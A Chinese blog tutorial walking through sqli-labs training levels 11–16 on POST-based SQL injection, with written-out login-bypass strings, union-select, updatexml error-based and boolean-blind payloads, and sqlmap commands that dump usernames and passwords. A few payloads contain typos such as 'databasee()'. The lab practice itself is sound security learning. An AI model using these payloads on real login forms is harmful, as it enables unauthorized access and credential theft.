一篇文章教会POST型SQL注入小白之sqli-labs靶场超详细原理(less-11~less-16:POST注入)

已于 2025-03-07 21:40:48 修改
阅读量752 收藏 22
点赞数 31
分类专栏: SQL-labs靶场 文章标签: sql 数据库
于 2025-02-28 01:36:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77091612/article/details/145864232
版权

目录

什么是POST型SQL注入

GET型SQL注入

POST型SQL注入

sqli-labs靶场 Less-11(POST_非盲注)

判断闭合方式

万能密码

判断字段数

判断报错回显位置

判断数据库

判断数据表

判断列名

爆出数据

sqlmap工具注入

安装sqlmap

bp抓包

判断数据库

判断数据表

判断列名

爆出表中的数据

sqli-labs靶场 Less-12(POST_非盲注)

判断闭合方式

判断字段数

​编辑判断报错回显位置

判断数据库

判断数据表

判断列名

爆出表的数据

sqli-labs靶场 Less-13(POST_基于报错的盲注--updatexml函数注入)

判断闭合方式

判断字段数

判断报错回显位置

判断数据库(security)

判断数据表

判断列名

爆出数据

sqli-labs靶场 Less-14(POST_基于报错的盲注--updatexml函数注入)

判断闭合方式

判断字段数

判断报错回显位置

updatexml函数判断数据库

判断数据表

判断列名

爆出数据

sqli-labs靶场 Less-15(POST_基于布尔的盲注)

判断闭合方式

判断数据库

判断数据表

一般盲注比较繁琐,方法和GET型 一样,这里我就直接用sqlmap自动注入了,和第11关一样

sqlmap注入

bp抓包

数据库

数据表

​数据列名

​爆出数据

sqli-labs靶场 Less-16(POST_基于布尔盲注)

判断闭合方式

其他的就和第十五关一样啦,只不过是把闭合方式改为"),就不多写了,各位师傅自行试一下哦。

下一篇更新less17~less19,不同注入点的错误注入,

不喜勿喷,如果有错误,希望各师傅来纠正,如有雷同,纯属巧合。

0基础SQL注入小白可以关注我哦~,和我一起自律学习

欢迎关注公众号

什么是POST型SQL注入

GET型SQL注入

  • 使用HTTP的GET请求,数据通过URL传递,通常是通过查询字符串(Query String)来传递。
  • 例如:http://example.com/search?id=1,其中 id=1 是传递给服务器的参数。

POST型SQL注入

  • 使用HTTP的POST请求,数据通过HTTP请求体(Body)传递,而不是在URL中显示。
  • 例如,表单提交时,数据通过POST请求发送,数据通常是隐藏在请求的正文部分。

sqli-labs靶场 Less-11(POST_非盲注)

题目:

POST - Error Based - Single quotes- String
POST -基于错误-单引号-字符串

判断闭合方式

在用户名上输入下面的代码,密码随便写。

SQL 查询中,用户名字段通常用单引号 ' 来围绕(即字符串闭合)。当攻击者输入 ' 时,实际会闭合原来的字符串,打破 SQL 查询的结构。最终的sql语句为:
SELECT * FROM users WHERE username = '' OR 1=1 -- AND password = 'password123';

  • username = '':用户名部分为空字符串。
  • OR 1=1:总是返回真,导致该条件始终成立,查询结果返回所有用户。
  • --:注释掉了密码验证部分,导致查询不再考虑 password = '2'
1\

提交后发现有报错的回显,根据报错位置可知是单引号闭合方式

万能密码

对于这种POST型的sql注入,我们先考虑能不能用万能密码直接通过,万能密码的原理也是破坏了sql语句原有的逻辑,从而使查询恒成立,具体原理可以看我的另一篇文章:万能密码详解

万能密码不是唯一的,只要符合逻辑都可以。

在这里是单引号的注入方式,所以我们构造万能密码为

1' or 1=1#

#注意:这里为什么用#注释,而不用-- ,是因为-- 在这一关没有起到任何注释的作用,所以我们尝试用#注释

发现直接以Dumb的账户成功登录

当万能密码不能用时,我们就老老实实的手动注入或者用sqlmap注入,先讲手动注入

判断字段数

和GET型注入一样,也是用union联合注入判断字段数

1' order by 3#

当是3时报错,当是2时没有报错,说明字段数为2

1' order by 2#

判断报错回显位置

根据报错信息是回显位置为字段1和字段2

1' union 1,2#

判断数据库

1' union select 1,database()#

判断数据表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

判断列名

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

爆出数据

1' union select 1,(select group_concat(username,':',password) from security.users)#

也可以用sqlmap自动注入工具

sqlmap工具注入

安装sqlmap

安装sqlmap很简单,先到官网https://sqlmap.org/下载压缩包

解压到python的安转路径目录下,在sqlmap的目录下以管理员的身份运行cmd

输入下面的代码安装sqlmap

python sqlmap.py

这样就成功安装了

bp抓包

先用bp抓包,再把POST数据包保存到1.txt文件

判断数据库

有一些选项都选y

python sqlmap.py -r "D:\1.txt" --dbs

成功得到数据库

判断数据表

python sqlmap.py -r "D:\1.txt"  -D security --tables

判断列名

python sqlmap.py -r "D:\1.txt"  -D security -T users --columns

爆出表中的数据

python sqlmap.py -r "D:\1.txt"  -D security -T users -C "username,password" --dump

sqli-labs靶场 Less-12(POST_非盲注)

题目:POST - Error Based - Double quotes- String - with twist
POST -基于错误的-双引号-字符串-扭曲

判断闭合方式

1\

发现页面报错信息如下,所以闭合方式为")

判断字段数

同样发现3的时候报错,2的时候没有报错

1") order by 3#

判断报错回显位置

和第11关一样我就不解释了,只放结果图,可以选择sqlmap会快一点,如果想练习代码,加强熟悉度,可以手动注入,加强理解。

1") union select 1,2#

判断数据库

1") union select 1,databasee()#

判断数据表

1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

判断列名

1") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

爆出表的数据

1") union select 1,group_concat(username,':',password) from users#

sqli-labs靶场 Less-13(POST_基于报错的盲注--updatexml函数注入)

题目:POST - Double Injection - Single quotes- String - with twist
POST -双注入-单引号-字符串-扭曲

判断闭合方式

也可以根据题目的提示,该闭合方式是')

1\

判断字段数

字段数为2

判断报错回显位置

发现没有回显位置,但是有报错信息,所以和第五关第六关一样,是基于报错的盲注,用updatexml函数,具体解释和用法看我的第二篇SQL注入详说updataxml

判断数据库(security)

1') and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)#

判断数据表

1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

判断列名

1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e),1)#

爆出数据

1') and updatexml(1,concat(0x7e,(select group_concat(username,':',password) from users),0x7e),1)#

sqli-labs靶场 Less-14(POST_基于报错的盲注--updatexml函数注入)

题目:POST-双注入-单引号-字符串-扭曲
PosT-Double Injection -Single quotes-String -with twist

判断闭合方式

双引号闭合方式,不知道为什么题目是单引号

1\

判断字段数

同样发现有两个字段

判断报错回显位置

在username输入以下代码,也是  没有回显位置,和13关一样

1" union select 1,2#

updatexml函数判断数据库

和第13关一样就不多写了,直接把结果截图

1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

判断数据表

判断列名

爆出数据

sqli-labs靶场 Less-15(POST_基于布尔的盲注)

题目:盲-布尔/基于时间-单引号
Blind-Boolian/time Based -Single quotes

判断闭合方式

当我们按照平时的方式输入1\时,发现没有报错的信息,和GET型的时间盲注一样,也可以用布尔盲注,时间盲注在我写的另一篇less5-less10关,这里我就用布尔盲注

根据题目的提示,该题目是基于单引号的盲注

判断数据库

当数据库的长度大于7时,页面登录成功,当数据库的长度是大于8时,页面登录失败,所以数据库的长度为8

1' or length(database())>7#

判断数据库的第一个字母,在这里我们用ascii函数判断数据库,大于114是登录成功,大于115时登录失败,所以第一个字母的ascii值为115,即s

1' or ascii(substr(database(),1,1))>114#

以此类推,可得到数据库为security,接着判断数据表

判断数据表

判断数据表的长度,其实做了这么久也发现了,不管是GET型还是POST型,都离不开基本的数据库、数据表、字段等的查询语句。

1' or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5#

一般盲注比较繁琐,方法和GET型 一样,这里我就直接用sqlmap自动注入了,和第11关一样

sqlmap注入

bp抓包

数据库

python sqlmap.py -r "D:\1.txt" --dbs

数据表

python sqlmap.py -r "D:\1.txt" -D security --tables

数据列名

python sqlmap.py -r "D:\1.txt" -D security -T users --columns

爆出数据

比较慢就不跑完了,各位师傅自行试试

python sqlmap.py -r "D:\1.txt" -D security -T users -C "username,password" --dump

sqli-labs靶场 Less-16(POST_基于布尔盲注)

题目:POST-盲-布尔/基于时间-双引号
bosT-Blind-Boolian/Time Based -Double quote

判断闭合方式

发现只有")时才成功,所以闭合方式是")

1") or 1=1#

其他的就和第十五关一样啦,只不过是把闭合方式改为"),就不多写了,各位师傅自行试一下哦。

下一篇更新less17~less19,不同注入点的错误注入,

不喜勿喷,如果有错误,希望各师傅来纠正,如有雷同,纯属巧合。

0基础SQL注入小白可以关注我哦~,和我一起自律学习

欢迎关注公众号【Cauchy安全】

靶场——SQL注入
newqian的博客
08-06 1791
接下来不多搞了,总结一下,get和post区别不大,都是看反馈选择对应的注入方式,不过一个主要靠地址栏,一个看from菜单输入,根据不同需求选择注入方式,联合查询就是一起查,全部一起显示,不过要注意长度限制,和表名列名获取等等。利用文件导入的方式进行注入,不过条件苛刻,首先要有root权限,接着需要知道网站路径,最后还需要一个为空,就真的是空的,不是null,由于条件过于苛刻,因此很少见(原理就是利用其先上传再删除的机制,可以与程序抢进程,使其上传到上级目录,这样即使原目录的文件删除也没用)
Sqli-labs靶场11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1801
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQL注入POST注入
weixin_43765321的博客
03-03 3978
1. POST请求介绍 1.1 POST消息头实例 1.2 POST请求介绍 POST方法起初是用来向服务器输入数据的 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交/文件上传等,请求会被包含在请求体中 POST方法可能会创建新的资源或修改现有资源 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 1.3 POST请求特点 POST请求不能被缓存下来 POST请求不会保存在浏览器
Sql注入-POST注入
purvispanwu的博客
12-19 2933
sql注入,网络安全
SQL注入post注入
banliyaoguai的博客
05-21 1445
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
sql注入--POST注入
pakho_C的博客
01-04 4592
sql注入POST注入 靶场sqli-labs-master 下载链接:靶场下载链接 POST和GET的区别 GET提交的数据会显示在URL中,POST则不会。这是最显而易见的差别。这点意味着GET更不安全(POST也不安全,因为HTTP是明文传输抓包就能获取数据内容,要想安全还得加密) GET回退浏览器无害,POST会再次提交请求(GET方法回退后浏览器再缓存中拿结果,POST每次都会创建新资源) GET提交的数据大小有限制(是因为浏览器对URL的长度有限制,GET本身没有限制),POST没有 GET
sqli-labs:一个sql注入靶场网站
最新发布
01-21
sqli-labs是一个专门设计用来帮助安全研究人员和开发者学习和练习SQL注入技术的靶场网站。SQL注入是一种常见的网络攻击手段,攻击者通过在Web表单输入或在浏览器地址栏中输入恶意SQL代码,试图对数据库进行未授权的...
sqli-labs 靶场源码
01-06
sqli-labs是一个基于PHP环境搭建的SQL注入靶场,它为安全研究人员和开发者提供了模拟真实场景下SQL注入漏洞的测试环境。在实际的网络安全实践中,SQL注入是一种常见的攻击手段,攻击者通过在应用程序的输入字段中...
sqli-labs靶场练习笔记
11-09
- **SQLi-Labs介绍**:SQLi-Labs是一款专为学习和实践SQL注入技术而设计的靶场环境。它包含了多个关卡,每个关卡都模拟了一个具有特定SQL注入漏洞的应用场景。 - **学习价值**:通过解决这些关卡中的问题,学习者...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
SQL注入---POST注入
zhoutong2323的博客
04-07 1638
在Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
sql注入靶场
weixin_44382333的博客
09-22 203
盲注: updatexml()函数的理解(图床的设置)
sql注入靶场_sql注入
weixin_26705651的博客
09-21 1019
sql注入靶场My first experience with SQL injection was some 20 years ago but is still very relevant today. 我第一次使用SQL注入的经验大约是20年前,但是今天仍然非常重要。 With all the advanced Database access frameworks, features, and...
SQL注入——POST注入 HEAD注入
weixin_41487522的博客
04-10 782
SQL注入——POST注入 HEAD注入 POST注入介绍 POST注入属于注入的一种,相信大家都知道POST和GET两种传参方式。 POST注入就是使用POST进行传参的注入,本质上和GET类没什么区别。POST一般而言不会进行URL编码,但是GET会。 POST注入高危点: 登录框 查询框 各种与数据库有交互的框 最经典的POST注入莫过于万能密码: ’ or 1=1# 万能密码原理: se...
SQL注入POST注入和HEAD注入
qq_68233961的博客
07-10 1427
SQL注入POST注入和HEAD注入
SQL注入--靶场练习
wmr123456001的博客
02-11 2251
SQL注入靶场练习
SQL注入(php靶场为例)
qq_47632786的博客
02-07 529
一般可用 and 1=1 1=2 /1=3/2-1来判断,当两次输出结果相同时,可判断为字符注入,若输出结果不同,则为数字注入。mysql数据库中,information—schema中包含数据库中所有的信息,其中含有tables表,和columns表,两个表中分别包含了所有的表明及列名。上述查询,如上图所示,仅显示一个表名,所以我们需要用 group_concat()确保所有查询信息能放到一行显示出来。③如果是字符,找到闭合方式,闭合方式多为:’ 、" 、 ’ ) 、 ")
iwebsec靶场sql注入
果粒程
02-24 1356
iwebsec靶场sql注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值